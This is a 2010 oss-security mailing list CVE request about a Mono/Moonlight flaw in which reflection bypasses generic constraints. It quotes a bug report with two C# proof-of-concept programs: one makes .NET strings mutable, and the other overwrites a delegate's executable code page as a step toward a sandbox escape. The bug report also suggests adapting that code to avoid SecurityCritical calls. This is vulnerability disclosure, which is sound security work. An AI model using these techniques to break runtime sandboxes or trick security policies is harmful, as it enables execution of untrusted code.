[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201011251552.17678.thomas@suse.de>
Date: Thu, 25 Nov 2010 15:52:17 +0100
From: Thomas Biege <thomas@...e.de>
To: oss-security@...ts.openwall.com
Subject: CVE request: mono/moonlight: execution of arbitrary code due to mutable Strings
Hello.
Just a copy-n-paste from our bugzilla (again):
------------------------------------------------------------------------------
SP 2010-11-24 20:45:21 UTC
Original (pulled by author) blog entry:
So I was messing around with generic methods and discovered that generic
constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection (with the
exception of the new() constraint). One of the fun results of this bug is that
the String class can be made mutable without using reflection to set private
members!
The following code demonstrates this; it is legal and will run on Mono up to
and including version 2.8:
using System;
using System.Reflection;
public class FakeString {
public int length;
public char start_char;
}
public class TestCase {
private static FakeString UnsafeConversion<T>(T thing)
where T : FakeString
{
return thing;
}
public static void Main() {
var a = "foo";
var b = MakeMutable(a);
Console.WriteLine(a);
b.start_char = 'b';
Console.WriteLine(a);
}
private static FakeString MakeMutable(string s)
{
var m = typeof(TestCase).GetMethod("UnsafeConversion",
BindingFlags.NonPublic | BindingFlags.Static);
var m2 = m.MakeGenericMethod(typeof(string));
var d = (Func<string,
FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null,
m2);
return d(s);
}
}
Comment 1 SP 2010-11-24 20:54:20 UTC
This is a follow up of the previous
https://bugzilla.novell.com/show_bug.cgi?id=654136
The original blog entry allow trusted (by moonlight) code to mutate strings
which could be used to trick policies (e.g. give a valid URL and, once
accepted
as a valid xdomain URL, change it to something else).
It can also be extended to arbitrary code execution. POC by Geoff Norton:
using System;
using System.Reflection;
using System.Runtime.InteropServices;
public class DelegateWrapper {
public IntPtr method_ptr;
}
public delegate void MethodWrapper ();
public class BreakSandbox {
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;
}
private static DelegateWrapper ConvertDelegate (Delegate del) {
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
var gm = m.MakeGenericMethod (typeof (Delegate));
var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);
return d (del);
}
public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");
};
d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
d ();
}
}
This code won't execute on Moonlight (since all Marshal.* code is
SecurityCritical) but it would not be hard to modify the POC to do the same
without SecurityCritical code.
Note: the bug is present in Mono but does not represent a security
vulnerability there since Mono (unlike Moonlight) can only execute trusted
code.
[reply] [-]
Private
Comment 2
------------------------------------------------------------------------------
--
Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support & Auditing
SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
--
Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
-- Marie von Ebner-Eschenbach
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
